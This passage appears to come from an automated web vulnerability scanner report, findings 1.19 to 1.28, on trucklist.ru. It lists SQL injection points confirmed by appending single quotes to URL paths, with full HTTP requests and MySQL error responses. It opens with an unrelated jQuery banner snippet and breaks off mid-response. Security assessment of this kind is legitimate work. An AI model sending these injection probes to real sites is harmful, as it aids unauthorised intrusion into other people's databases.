   }

   var speed = 'fast';

   var j = jQuery.noConflict();
   var selectedTab = 0;
   j(document).ready(function(){
       j("#tab"+selectedTab).show();
       j("#tab"+selectedTab).addClass('visible');
       j("#link_tab"+selectedTab).addClass('selected');
       j("#bannerWrapper").css({'left': '-'+(980*selectedTab)+'px'});

       j(".clicker").live('click',function(){
           var linkId = j(this).attr('id').split('_');
           var tab = linkId[1];
           var indx = null;
           j('.clicker').each(function(){
               if(j(this).hasClass('selected'))
               {

                   indx = j(this).attr('id').split('_');
                   j(this).removeClass('selected');
               }
           });

           indexNum = indx[1].replace(/[^\d]+/i,'');
           var clicked = tab.replace(/[^\d]+/i,'');

           var diff = clicked-indexNum;

           j('#bannerWrapper').animate({"left":"-="+(980*diff)},speed);


           j(this).addClass('selected');



           j('.visible').fadeOut(speed,function(){
               j(this).removeClass('visible');
               j('#'+tab).fadeIn(speed);
               j('#'+tab).addClass('visible');
               SetCookie('tab', selectedTab,-1);
               SetCookie('tab', clicked,1);
           });

           return false;
       });

   });
</script>
<style type="text/css" media="all">
   div.hidden{
       display:none;
   }
   div.visible{
       display: block;
   }

   div.page_banner{
       width: 980px;
       float: left;
   }

   div#bannerWrapper {
       width: 1960px;
       position: absolute;
       left: 0;
   }


</style>
<div style="width: 980px; overflow: hidden; height: 250px;">
   <div id="bannerWrapper">
       <div class="page_banner" id="img_tab0">
            <a href="/us/home/smart-security"><div style="display:block; position: absolute; height: 250px; width: 980px;"></div></a>
   <h1>
       <div style="background-image:url(/us/images/banners/banner_home_ecs_pc.jpg); width:980px; height:250px;">
       <div style="position:absolute; top:127px; left: 433px">
                               <a href="/us/home/smart-security" ><img src="/us/images/sub_banner_button_buy.jpg" alt="Buy ESET Smart Security 4" style="margin-right:10px" /></a>

...[SNIP]...

1.19. http://www.trucklist.ru/cars/undefined [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/cars/undefined

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /cars'/undefined HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:00:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:45:31 GMT
Content-Length: 6600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /cars''/undefined HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:00:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:00:18 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.20. http://www.trucklist.ru/cars/undefined [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/cars/undefined

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /cars/undefined' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:02:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:02:39 GMT
Content-Length: 6600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /cars/undefined'' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:02:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:48:03 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.21. http://www.trucklist.ru/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /favicon.ico' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:00:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:00:05 GMT
Content-Length: 6594

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.22. http://www.trucklist.ru/plugins/ajax/enums.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/plugins/ajax/enums.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

POST /plugins/ajax/enums.php' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
Origin: http://www.trucklist.ru
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30
Content-Length: 19

name=truck_make_&_=

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:49:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:49:45 GMT
Content-Length: 6616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.23. http://www.trucklist.ru/plugins/ajax/enums.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/plugins/ajax/enums.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

POST /plugins/ajax/enums.php/1' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
Origin: http://www.trucklist.ru
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30
Content-Length: 19

name=truck_make_&_=

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:48:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:33:25 GMT
Content-Length: 6620

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.24. http://www.trucklist.ru/vendors/calendar/super_calendar.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/vendors/calendar/super_calendar.js

Issue detail

Request

GET /vendors/calendar/super_calendar.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:47:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:32:52 GMT
Content-Length: 6640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.25. http://www.trucklist.ru/webroot/delivery/css/global.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/css/global.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /webroot/delivery/css/global.css'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:39:13 GMT
Content-Length: 6634

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/css/global.css''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:54:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:39:25 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.26. http://www.trucklist.ru/webroot/delivery/js/global.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/global.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /webroot/delivery/js/global.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:47:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:47:36 GMT
Content-Length: 6630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.27. http://www.trucklist.ru/webroot/delivery/js/jquery.cookie.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/jquery.cookie.js

Issue detail

Request

GET /webroot/delivery/js/jquery.cookie.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:32:09 GMT
Content-Length: 6644

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.28. http://www.trucklist.ru/webroot/delivery/js/jquery.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/jquery.js

Issue detail

Request 1

GET /webroot/delivery/js/jquery.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:53:28 GMT
Content-Length: 6630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/js/jquery.js''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
